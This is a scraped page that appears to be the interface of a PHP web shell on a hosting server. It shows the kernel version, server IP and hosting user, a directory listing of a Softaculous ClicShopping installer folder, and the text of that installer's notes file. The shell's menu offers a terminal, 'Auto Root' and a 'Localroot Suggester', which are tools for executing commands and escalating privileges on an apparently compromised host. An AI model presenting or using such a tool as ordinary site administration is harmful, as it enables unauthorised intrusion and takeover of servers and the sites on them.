Linux sh52.ich-4.com 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
LiteSpeed
Server IP : 198.143.147.58 & Your IP : 216.73.217.21
Domains :
Cant Read [ /etc/named.conf ]
User : actualbuzz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
clicshop /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-04-30 11:45
php53
[ DIR ]
drwxr-xr-x
2026-04-30 11:45
php56
[ DIR ]
drwxr-xr-x
2026-04-30 11:45
php71
[ DIR ]
drwxr-xr-x
2026-04-30 11:45
php81
[ DIR ]
drwxr-xr-x
2026-04-30 11:45
php82
[ DIR ]
drwxr-xr-x
2026-04-30 11:45
ElFinderConfig.php
195
B
-rw-r--r--
2021-12-23 06:54
clone.php
6.72
KB
-rw-r--r--
2026-04-29 07:46
edit.php
4.45
KB
-rw-r--r--
2026-04-29 07:46
edit.xml
447
B
-rw-r--r--
2021-12-23 06:54
extend.php
9.87
KB
-rw-r--r--
2026-04-29 07:46
fileindex.php
368
B
-rw-r--r--
2026-04-29 03:55
global.php
369
B
-rw-r--r--
2025-09-09 05:30
import.php
3.36
KB
-rw-r--r--
2026-04-29 07:46
info.xml
5.79
KB
-rw-r--r--
2026-04-29 03:55
install.js
924
B
-rw-r--r--
2021-12-23 06:54
install.php
4.62
KB
-rw-r--r--
2026-04-29 07:46
install.xml
1.36
KB
-rw-r--r--
2025-05-02 06:00
md5
3.26
KB
-rw-r--r--
2026-04-29 07:46
notes.txt
818
B
-rw-r--r--
2026-01-12 02:43
site_conf.php
235
B
-rw-r--r--
2025-09-09 05:30
site_conf_.php
289
B
-rw-r--r--
2025-09-09 05:30
update_pass.php
255
B
-rw-r--r--
2021-12-23 06:54
Save
Rename
1. PHP REQUIREMENT LINK : https://www.clicshopping.org/forum/technical-information/ and also check /install/templates/pages/ (line 53 i.e if (version_compare(phpversion(), '8.3', '<'))) and https://github.com/ClicShopping#Requirement . In 4.11 composer dependencies need PHP 8.4 (reference from Core/ClicShopping/External/vendor/composer/platform_check.php, On 8.3 following error is thrown i.e Your Composer dependencies require a PHP version ">= 8.4.0", hence we have kept 8.4.0 as PHP requirement in info.xml) 2. Timezone : Select New York. 3. Install without demo data. 4. Keep SMTP details blank. 5. 'api_key' & 'mcp_key' column value is hardcoded in `clic_api` & `clic_mcp` table in Core\ClicShopping\Apps\Configuration\Api\Sql\MariaDb\MariaDb.php, no need to configure. Refer \install\Db\clicshopping.sql file.